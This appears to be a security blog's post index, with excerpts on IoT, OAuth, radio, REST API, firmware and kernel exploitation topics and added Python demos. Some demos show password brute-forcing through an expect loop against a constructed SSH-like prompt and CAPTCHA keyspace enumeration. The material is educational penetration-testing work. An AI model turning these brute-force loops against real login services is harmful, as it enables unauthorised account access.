IoT Security – Part 1 (101 – IoT Introduction and Architecture)

The problem with every new and complex technology, for security researchers, is not knowing where to start and how or where to attack. This is a common problem and has a common solution: break the technology into small components and start learning each component individually. This process makes you master each component and lets you focus on the components you find most interesting. If you have read till here, I’m assuming you are going to stick around and read through. So, without any delay, let’s start : ) . Note: 1. The information in this blog series is generic and can be applied to the security research of IoT products in any domain irrespective of their usage, including home automation, industrial control systems, healthcare, transportation etc. 2. I will use the words device, hardware and sensor interchangeably to mean the same thing unless specifically mentioned otherwise. 3. I say IoT ecosystem to mean an IoT product or solution, because IoT technology by its nature comprises several different technologies. IoT != Hardware...

05 August 2017

OAuth Security Overview

In OAuth, “Auth” stands for authorization: it is a framework for delegating access, and the user is authenticated by the service provider rather than by the third-party application. Before OAuth, other methods were used to protect a user’s ID and password from other applications. When a user accesses a secured web application, it first verifies the user’s identity by logging them in, and then it ensures that the user has access only to the data or functionality in the application which they are authorized for. So the basic requirements are identity and permission, i.e. authentication and authorization. OAuth allows an application to gain access to a user’s data within another application without knowing the user’s login ID and password for that second application. When OAuth is performed, the service provider authenticates the user itself and then asks whether the user wants to authorize the request of the third-party application.   OAuth History...
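The property the paragraph describes, that the third-party application obtains access without ever seeing the user's password at the provider, is easiest to see with all three parties side by side. The example below is added here and is not the post's code: it models the authorization code grant with an in-process stand-in for the provider (authorization server), a client app and constructed user and client credentials (hypothetical names and secrets). It also shows the check a practitioner looks for first: the client binds each callback to the login it started via the `state` parameter, so a code planted by an attacker into a victim's session is rejected, and the provider accepts each code once only.

```python
"""Authorization-code flow in miniature: the client never learns the user's password.

Added example, not the original post's code. All parties are in-process
stand-ins; user names, client ids and secrets are constructed.
"""
import hmac
import secrets
from typing import Dict, Optional


class AuthorizationServer:
    """Stand-in service provider: holds the users' credentials, issues codes and tokens."""

    def __init__(self):
        self.users = {"alice": "correct horse battery staple", "mallory": "mallory-pass"}
        self.clients = {"photo-app": "client-secret-xyz"}
        self._codes: Dict[str, dict] = {}
        self._tokens: Dict[str, dict] = {}

    def authorize(self, client_id, redirect_uri, scope, state, username, password, consent):
        """The user logs in *here* and is asked for consent; returns the redirect params."""
        if self.users.get(username) != password or not consent:
            return {"error": "access_denied", "state": state}
        code = secrets.token_urlsafe(16)
        self._codes[code] = {"client_id": client_id, "redirect_uri": redirect_uri,
                             "scope": scope, "user": username}
        return {"code": code, "state": state}

    def token(self, client_id, client_secret, code, redirect_uri) -> Optional[str]:
        """Exchange a one-time code for an access token; the client authenticates itself."""
        grant = self._codes.pop(code, None)          # pop: a code is usable once
        if (grant is None or grant["client_id"] != client_id
                or grant["redirect_uri"] != redirect_uri
                or not hmac.compare_digest(self.clients.get(client_id, ""), client_secret)):
            return None
        tok = secrets.token_urlsafe(24)
        self._tokens[tok] = {"user": grant["user"], "scope": grant["scope"]}
        return tok

    def introspect(self, token):
        return self._tokens.get(token)


class ClientApp:
    """Third-party app; a per-session state value binds each callback to the login it started."""

    def __init__(self, auth, client_id="photo-app", client_secret="client-secret-xyz"):
        self.auth, self.client_id, self.client_secret = auth, client_id, client_secret
        self.redirect_uri = "https://photo-app.example/callback"   # hypothetical
        self.sessions: Dict[str, str] = {}

    def start_login(self, session_id):
        state = secrets.token_urlsafe(16)
        self.sessions[session_id] = state
        return {"client_id": self.client_id, "redirect_uri": self.redirect_uri,
                "scope": "photos:read", "state": state}

    def callback(self, session_id, params) -> Optional[str]:
        """Return an access token, or None when the callback is not bound to this session."""
        expected = self.sessions.get(session_id)
        if expected is None or not hmac.compare_digest(expected, params.get("state", "")):
            return None      # login CSRF: callback carries a state this session never issued
        if "code" not in params:
            return None      # user denied consent or login failed at the provider
        return self.auth.token(self.client_id, self.client_secret,
                               params["code"], self.redirect_uri)


def happy_path():
    auth, app = AuthorizationServer(), None
    app = ClientApp(auth)
    req = app.start_login("sess-1")
    # alice types her password at the provider; the client app only ever sees the code.
    redirect = auth.authorize(username="alice", password="correct horse battery staple",
                              consent=True, **req)
    return auth.introspect(app.callback("sess-1", redirect))


def forged_callback():
    """Attacker plants a code for *their* account into the victim's session: state blocks it."""
    auth = AuthorizationServer()
    app = ClientApp(auth)
    app.start_login("victim")
    attacker_req = app.start_login("attacker")
    redirect = auth.authorize(username="mallory", password="mallory-pass",
                              consent=True, **attacker_req)
    return app.callback("victim", redirect)     # None: state belongs to the attacker's session
```

Without the `state` check the victim's session would silently be logged in as the attacker's account; the `pop` in `token()` is what stops a replayed code from minting a second token.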

24 July 2017

Getting started with Radio Hacking – Part 1 – Radio Frequency basics and theory

In this blog series, we will be learning about Radio Frequency (henceforth RF) theory, various modulation techniques and how to analyze them. Since the topic is huge, we will cover RF basics and theory in this part. Also, instead of using technical terms and definitions, I will be using simple words so that you can understand each topic or concept easily. Why should we study RF? Internet of Things, IoT: we have all heard this term, right? The popularity of IoT and of devices getting connected wirelessly is evident in today’s life. The majority of these devices communicate with each other wirelessly using radio protocols (frequency range ~3 kHz to 300 GHz). IoT devices use different radio protocols such as ZigBee, RFID, Bluetooth etc. for communication. Looking back, many vulnerabilities have been found and exploited in IoT devices through some form of radio communication. So, for pentesting IoT devices we need a strong foundation in the various radio protocols, how they communicate and the different modulation schemes they use. Thus, analyzing radio communication is of utmost importance from a security point of view and cannot be taken for granted. So let’s start....
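The paragraph promises modulation schemes; the simplest one, on-off keying (OOK, a form of amplitude-shift keying used by many cheap sub-GHz remotes), can be modulated and demodulated in a few lines, which makes the idea concrete before any SDR is involved. The example below is added here and is not the post's code: it synthesises baseband samples for a bit string, optionally adds constructed noise, and recovers the bits with a non-coherent envelope detector (mean absolute amplitude per symbol against a midpoint threshold). Sample rate, cycles per bit and noise level are arbitrary choices for the demo.

```python
"""OOK (on-off keying) modulate/demodulate, as an illustration of ASK.

Added example, not the original post's code. Parameters (samples per bit,
carrier cycles per bit, noise amplitude) are constructed for the demo.
"""
import math
import random
from typing import List


def ook_modulate(bits: List[int], samples_per_bit: int = 64, cycles_per_bit: int = 8) -> List[float]:
    """Carrier present for a 1, silence for a 0: the simplest amplitude-shift keying."""
    out = []
    for bit in bits:
        for n in range(samples_per_bit):
            phase = 2 * math.pi * cycles_per_bit * n / samples_per_bit
            out.append(math.sin(phase) if bit else 0.0)
    return out


def add_noise(samples: List[float], amplitude: float = 0.2, seed: int = 7) -> List[float]:
    """Constructed additive noise (uniform, seeded) to show the detector has margin."""
    rng = random.Random(seed)
    return [s + rng.uniform(-amplitude, amplitude) for s in samples]


def ook_demodulate(samples: List[float], samples_per_bit: int = 64) -> List[int]:
    """Envelope detector: mean |x| per symbol, thresholded halfway between min and max.

    Caveat: with no symbol variation (all 0s or all 1s) the threshold collapses and
    every symbol decodes as 0; real receivers carry a calibrated threshold instead.
    """
    energies = [
        sum(abs(x) for x in samples[i:i + samples_per_bit]) / samples_per_bit
        for i in range(0, len(samples), samples_per_bit)
    ]
    threshold = (max(energies) + min(energies)) / 2
    return [1 if e > threshold else 0 for e in energies]


if __name__ == "__main__":
    bits = [1, 0, 1, 1, 0, 0, 1, 0]
    clean = ook_modulate(bits)
    print("clean :", ook_demodulate(clean))
    print("noisy :", ook_demodulate(add_noise(clean)))
```

The same envelope-then-threshold step is what you do by eye on a captured waveform: symbol width gives the baud rate, and the on/off pattern gives the raw bits before any framing or encoding (Manchester, PWM) is undone.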

14 July 2017

Writeup for inst_prof(pwn) from Google CTF 2017

Please help test our new compiler micro-service. Challenge running at I don’t know what inst_prof means; it might be “instruction profiler”? idk. It was a pwn challenge. The challenge was tricky yet simple. Let’s start. $ file inst_prof...

07 July 2017

Beginner’s Guide to RESTful API VAPT – Part 1

With more and more web applications being developed on top of web services (RESTful APIs), many web application penetration testers are wondering exactly how to test these web services and what to actually look for. To help explain how to perform VAPT of a REST API, let’s take a quick look at the basics of RESTful APIs. What is a RESTful API? Before understanding RESTful APIs, let’s take a look at what the term REST actually means. REST: REST stands for REpresentational State Transfer, a style of web architecture which describes six constraints. Uniform Interface...

07 July 2017

Beginner’s Guide to RESTful API VAPT – Part 2

You have got the basic concepts of REST APIs and how they are implemented. Now let’s get started with the main goal of this post, i.e. how to perform VAPT of a REST API web service and which issues we should be looking for. Finally, the Guide! REST API VAPT is somewhat similar to web application VAPT, since we need to look for the same standard vulnerabilities that we look for in a web application, such as SQL injection, access control, XSS, CSRF, etc. Apart from these standard vulnerabilities, we also need to look for API-specific vulnerabilities. Enumeration: Before attacking any web service it is necessary to know where you can start attacking. This can be tricky: finding the attack surface of a web application is easy, as we get a GUI to examine the different form fields, URLs, etc., but for an API we only get the API endpoint. In this stage we need to gather as much information as we can about the API’s endpoints, messages, parameters, behaviour and the technologies implemented. The following points help in gathering information about the API endpoints. a) If the client provides API programming documentation or configuration files, analyse them thoroughly: check how user authentication is implemented, check the URL style used, check which standard and non-standard HTTP headers are required to interact with the API service, and analyse the error codes and descriptions to get a clear idea of the valid range of values an API endpoint accepts and of how authentication and authorisation are handled by the web service....
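Point (a) is mechanical once the documentation is machine-readable, which for most APIs today means an OpenAPI (Swagger) description. The example below is added here and is not the post's code: it walks a constructed, hypothetical OpenAPI document and produces exactly the inventory the paragraph asks for, one row per method and path with its authentication requirement, path/query parameters, required headers (standard and `X-` custom ones) and documented error codes, then flags the operations that opt out of the global security scheme. The document, endpoints and header names are invented for the demo.

```python
"""Enumerate an API's attack surface from its OpenAPI document.

Added example, not the original post's code. OPENAPI_DOC is a constructed,
hypothetical description; endpoint, header and scheme names are invented.
"""
from typing import Dict, List, Tuple

OPENAPI_DOC = {
    "openapi": "3.0.0",
    "security": [{"bearerAuth": []}],                     # global default: token required
    "paths": {
        "/users/{id}": {
            "parameters": [{"name": "id", "in": "path", "required": True}],
            "get": {
                "parameters": [{"name": "X-Api-Version", "in": "header", "required": True},
                               {"name": "expand", "in": "query"}],
                "responses": {"200": {}, "401": {}, "404": {}},
            },
            "delete": {
                "security": [],                           # explicit opt-out: no auth at all
                "responses": {"204": {}, "404": {}},
            },
        },
        "/orders": {
            "post": {
                "parameters": [{"name": "Idempotency-Key", "in": "header"}],
                "responses": {"201": {}, "400": {}, "401": {}, "422": {}},
            },
        },
        "/health": {"get": {"security": [], "responses": {"200": {}}}},
    },
}

HTTP_METHODS = {"get", "put", "post", "delete", "patch", "head", "options", "trace"}


def enumerate_endpoints(doc: dict) -> List[Dict]:
    """One row per (method, path): auth requirement, params, headers, documented errors."""
    global_security = doc.get("security", [])
    rows = []
    for path, item in doc.get("paths", {}).items():
        shared = item.get("parameters", [])                 # path-level params apply to all ops
        for method, op in item.items():
            if method not in HTTP_METHODS:
                continue
            # An operation-level "security": [] overrides the global requirement with nothing.
            security = op.get("security", global_security)
            params = shared + op.get("parameters", [])
            rows.append({
                "method": method.upper(),
                "path": path,
                "auth": bool(security),
                "headers": sorted(p["name"] for p in params if p.get("in") == "header"),
                "params": sorted(p["name"] for p in params if p.get("in") in ("path", "query")),
                "errors": sorted(c for c in op.get("responses", {}) if c[0] in "45"),
            })
    return rows


def unauthenticated(rows: List[Dict]) -> List[Tuple[str, str]]:
    """Operations reachable without any documented security scheme: test these first."""
    return [(r["method"], r["path"]) for r in rows if not r["auth"]]


def custom_headers(rows: List[Dict]) -> List[str]:
    """Non-standard (X-) headers the API expects; each is an input worth fuzzing."""
    return sorted({h for r in rows for h in r["headers"] if h.lower().startswith("x-")})


if __name__ == "__main__":
    rows = enumerate_endpoints(OPENAPI_DOC)
    for r in rows:
        print(f'{r["method"]:6} {r["path"]:14} auth={r["auth"]!s:5} '
              f'params={r["params"]} headers={r["headers"]} errors={r["errors"]}')
    print("no auth:", unauthenticated(rows))
    print("custom headers:", custom_headers(rows))
```

Feed a real document in place of `OPENAPI_DOC` (a `json.load` of the spec the client hands over) and the unauthenticated list plus the set of documented 4xx codes gives you the first round of requests to send: an unauthenticated `DELETE` on a per-user resource is a finding before a single packet is sent.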

03 July 2017

Reversing and Exploiting BLE 4.0 communication

Before we start, we first need to understand Bluetooth communication. There are two types of Bluetooth communication: Classic Bluetooth, i.e. Bluetooth 2.0, and Bluetooth Low Energy, i.e. BLE 4.0. Actually, the Classic Bluetooth specification started from Bluetooth 1.0 and 1.0B. These specifications are handled by the SIG (Bluetooth Special Interest Group), and all Bluetooth manufacturers and service companies are members of the SIG....

26 June 2017

Firmware Visual Analysis Part-1

Firmware analysis gives a better understanding of the embedded device and what it contains. It helps to: identify vulnerabilities in the embedded device firmware; improve product stability and resistance to attacks; do security auditing...
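Visual analysis of a firmware image usually starts with an entropy plot: flat regions of zero entropy are padding, mid-range entropy is code or text, and regions near 8 bits per byte are compressed or encrypted and need unpacking or a key before anything else. The example below is added here and is not the post's code: it computes the Shannon entropy of fixed-size windows over a blob, merges neighbouring windows into labelled regions, and runs on a constructed image (zero padding, then a text-like block, then seeded random bytes standing in for a compressed section). Window size and the two thresholds are arbitrary choices for the demo.

```python
"""Sliding-window entropy over a firmware image, the data behind a visual analysis plot.

Added example, not the original post's code. The image is constructed
(padding + text-like block + seeded random bytes); thresholds are demo values.
"""
import math
import random
from typing import List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant block, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def entropy_profile(blob: bytes, window: int = 1024) -> List[Tuple[int, float]]:
    """(offset, entropy) for each non-overlapping window; plot this to get the picture."""
    return [(off, shannon_entropy(blob[off:off + window])) for off in range(0, len(blob), window)]


def label(entropy: float, low: float = 1.0, high: float = 7.5) -> str:
    if entropy < low:
        return "padding/empty"
    if entropy >= high:
        return "compressed/encrypted"
    return "code/data"


def classify_regions(blob: bytes, window: int = 1024, low: float = 1.0,
                     high: float = 7.5) -> List[Tuple[int, int, str]]:
    """Merge adjacent windows with the same label into (start, end, label) regions."""
    regions: List[Tuple[int, int, str]] = []
    for off, ent in entropy_profile(blob, window):
        lab = label(ent, low, high)
        end = min(off + window, len(blob))
        if regions and regions[-1][2] == lab:
            regions[-1] = (regions[-1][0], end, lab)
        else:
            regions.append((off, end, lab))
    return regions


def constructed_firmware() -> bytes:
    """Constructed sample image: 4 KiB zeros, 8 KiB text-like bytes, 8 KiB random bytes."""
    rng = random.Random(1)
    padding = bytes(4096)
    text = (b"bootloader v1.2 (c) example; mounting rootfs; starting watchdog\n" * 200)[:8192]
    high_entropy = bytes(rng.getrandbits(8) for _ in range(8192))
    return padding + text + high_entropy


if __name__ == "__main__":
    image = constructed_firmware()
    for start, end, lab in classify_regions(image):
        print(f"0x{start:06x}-0x{end:06x}  {lab}")
```

On a real image, read the file into `image` and widen `window` to a few KiB so the plot has one point per flash sector; a high-entropy region that `binwalk` or `file` cannot name is the first candidate for encrypted firmware.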

16 June 2017

iOS app Runtime analysis using GDB

We have crafted a vulnerable iOS application, ‘swizzle-me’, for understanding and learning how to use GDB to perform runtime analysis. Introduction to the app: ‘swizzle-me’ is a simple authentication app in which the user is required to enter valid credentials to get access to the application. App’s challenge: Your task is to bypass the login mechanism of the application and access the authenticated page! ...

09 June 2017

Attacking interactive applications with python’s pexpect

While off-the-shelf penetration testing programs and tools are used widely, there are situations in which certain tools might fail. Security professionals love to automate pentesting tasks and write their own tools while testing. For example, one can write one’s own port scanner when nmap fails. Such a custom script sends packets to a static host and reports the result, but what about the case where we are trying to attack an interactive service such as SSH, FTP, TELNET etc.? Let’s say we wish to brute-force the SSH service on a remote machine: there is a series of prompts, depending on the interaction between the client and the SSH server, that must be handled. Let’s check out some of the prompts the SSH service sends to a connecting client: 1. When connecting to an SSH server for the first time, a yes/no host-key prompt appears. 2. While trying a password....
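What pexpect gives you is an expect loop: read the child's output until one of several prompts appears, answer it, and branch on which prompt matched. The example below is added here and is not the post's code; to stay self-contained it does not use pexpect (or a real sshd) but implements the same loop over a pipe with the standard library, driving a constructed Python stand-in whose prompts copy the two the paragraph lists (the first-connection yes/no prompt and the password prompt, three attempts, invented password "s3cret"). With pexpect the `Expect` class collapses to `pexpect.spawn`, `expect` and `sendline`, and the driving logic stays the same.

```python
"""An expect loop over a pipe, driving an interactive login with several prompt types.

Added example, not the original post's code and not pexpect. The 'server' is a
constructed Python script whose prompts mimic ssh's; the password is invented.
"""
import subprocess
import sys
import textwrap
from typing import List, Optional

FAKE_SSH = textwrap.dedent('''
    import sys
    def ask(prompt):
        sys.stdout.write(prompt)
        sys.stdout.flush()
        return sys.stdin.readline().rstrip("\\n")
    # 1. first-connection host-key prompt
    if ask("Are you sure you want to continue connecting (yes/no)? ") != "yes":
        sys.exit(2)
    # 2. up to three password attempts, then the server drops the connection
    for _ in range(3):
        if ask("user@host's password: ") == "s3cret":      # constructed secret
            print("Welcome to the fake box")
            sys.exit(0)
        print("Permission denied, please try again.")
    sys.exit(1)
''')


class Expect:
    """Minimal expect/sendline over a subprocess's pipes (no pty, no timeout)."""

    def __init__(self, args: List[str]):
        self.proc = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                                     stderr=subprocess.STDOUT, bufsize=0)
        self.buffer = b""

    def expect(self, patterns: List[str]) -> int:
        """Read until one pattern appears; return its index, or -1 on EOF (child exited)."""
        while True:
            for i, pat in enumerate(patterns):
                idx = self.buffer.find(pat.encode())
                if idx != -1:
                    self.buffer = self.buffer[idx + len(pat):]   # consume through the match
                    return i
            chunk = self.proc.stdout.read(1)      # prompts end without newline: read bytewise
            if not chunk:
                return -1
            self.buffer += chunk

    def sendline(self, line: str) -> None:
        self.proc.stdin.write((line + "\n").encode())
        self.proc.stdin.flush()

    def close(self) -> None:
        if self.proc.poll() is None:
            self.proc.kill()
        self.proc.wait()


def brute_force(candidates: List[str]) -> Optional[str]:
    """Answer the host-key prompt, then try passwords until 'Welcome' or the server gives up."""
    session = Expect([sys.executable, "-c", FAKE_SSH])
    try:
        if session.expect(["(yes/no)? "]) != 0:
            return None
        session.sendline("yes")
        for password in candidates:
            if session.expect(["password: "]) != 0:      # EOF: attempts exhausted
                return None
            session.sendline(password)
            which = session.expect(["Welcome", "Permission denied"])
            if which == 0:
                return password
            if which == -1:
                return None
        return None
    finally:
        session.close()


if __name__ == "__main__":
    print("found:", brute_force(["password", "123456", "s3cret"]))
```

Against a real sshd the loop also has to reconnect after the per-connection attempt limit, which is exactly why a list of prompts, not a fixed script, is the right abstraction: each reconnect restarts at prompt 1.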

02 June 2017

Passive GSM sniffing with Software defined radio

I have been working on telecom security and software-defined radio for a few months and I noticed that there are very limited resources on the internet for beginners who want to get into telecom security. Not many people from the security industry are into this, and very little information has been shared online. I will share here whatever I have learnt in the past few months in a series of blog posts. Now, before getting into active security analysis of GSM networks, let’s first see what we can do by just passively sniffing the airwaves around us. To sniff the RF waves around us, the best way is to get your hands on an SDR. What is an SDR? According to Wikipedia, software-defined radio (SDR) is a radio communication system where components that have typically been implemented in hardware (e.g. mixers, filters, amplifiers, modulators/demodulators, detectors, etc.) are instead implemented by means of software on a personal computer or embedded system. In simple terms, it refers to a technique in which all the processing is done in software; the processing includes mixing, filtering, demodulation etc. We can use an SDR to capture airwaves when it is tuned to a particular frequency. The frequency range it can capture and the bandwidth differ between SDR devices. Here we will be using the RTL-SDR, the cheapest one available, to sniff GSM....

27 May 2017

Is your Captcha really secure?

A CAPTCHA is a challenge-response test used in computing to distinguish humans from machines. It is implemented as a security feature to stop the automation of a process. But what if a small piece of code is able to solve that challenge and successfully convince the application that the form has been submitted by a human? While performing web application security assessments for different applications, we came across many wrong implementations of CAPTCHA by developers. So here are some of the common mistakes developers make while implementing a CAPTCHA in an application: Using only numbers with a short string length. The number of combinations required to brute-force the CAPTCHA will then be small. Here the length of the string is 4. To brute-force the string above, the total number of tries will be 10*10*10*10 = 10000, which is very few....
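The arithmetic above only becomes an exploitable bug when the server lets the same challenge be answered an unlimited number of times. The example below is added here and is not the post's code: it models a server-side verifier for a constructed 4-digit numeric challenge, runs a keyspace enumeration against it, and then shows the two knobs that decide the outcome, a per-challenge attempt limit (the challenge dies after a few wrong answers) and a larger alphabet/length, with the keyspace size computed for comparison. The challenge answers and limits are invented for the demo.

```python
"""Brute-forcing a short numeric CAPTCHA, and the server-side limit that stops it.

Added example, not the original post's code. The challenge answers and the
attempt limit are constructed values.
"""
import itertools
import string
from typing import Optional, Tuple


class ServerCaptcha:
    """Constructed server-side verifier for one challenge.

    max_attempts=None reproduces the weak implementation: the same challenge may be
    answered forever. A small limit invalidates the challenge after a few misses.
    """

    def __init__(self, answer: str, max_attempts: Optional[int] = None):
        self._answer = answer
        self.max_attempts = max_attempts
        self.attempts = 0
        self.solved = False

    def verify(self, guess: str) -> bool:
        if self.solved:
            return False                       # a solved challenge is single-use
        if self.max_attempts is not None and self.attempts >= self.max_attempts:
            return False                       # challenge expired: client must fetch a new one
        self.attempts += 1
        if guess == self._answer:
            self.solved = True
        return self.solved


def keyspace(alphabet: str, length: int) -> int:
    """Number of candidates an attacker must try in the worst case."""
    return len(alphabet) ** length


def brute_force(captcha: ServerCaptcha, alphabet: str = string.digits,
                length: int = 4) -> Tuple[Optional[str], int]:
    """Enumerate the keyspace against one challenge; return (answer or None, attempts used)."""
    for combo in itertools.product(alphabet, repeat=length):
        guess = "".join(combo)
        if captcha.verify(guess):
            return guess, captcha.attempts
        if captcha.max_attempts is not None and captcha.attempts >= captcha.max_attempts:
            return None, captcha.attempts       # no point continuing against a dead challenge
    return None, captcha.attempts


if __name__ == "__main__":
    print("4 digits:", keyspace(string.digits, 4), "candidates")
    print("6 alphanumerics:", keyspace(string.ascii_letters + string.digits, 6), "candidates")
    print("unlimited attempts ->", brute_force(ServerCaptcha("7391")))
    print("3 attempts per challenge ->", brute_force(ServerCaptcha("7391", max_attempts=3)))
```

The attempt limit alone turns ten thousand free guesses into a fresh challenge every three tries; the `solved` flag covers the separate mistake of accepting one solved challenge for many submissions.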

05 August 2016

Uninitialized Stack Variable – Windows Kernel Exploitation

INTRODUCTION We are going to discuss the Uninitialized Stack Variable vulnerability. This post will brief you on what an uninitialized variable is and what the adverse effects could be ...

18 January 2016

From Crash To Exploit: Cve-2015-6086 – Out Of Bound Read/aslr Bypass

INTRODUCTION This is the story of an Out of Bounds Read bug in Internet Explorer 9-11. It is an almost five-year-old bug which was discovered in April 2015. It is a very interesting bug, at least from m...

28 May 2015

Hacksys Extreme Vulnerable Driver

INTRODUCTION HackSys Extreme Vulnerable Driver is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at the kernel level. Hack...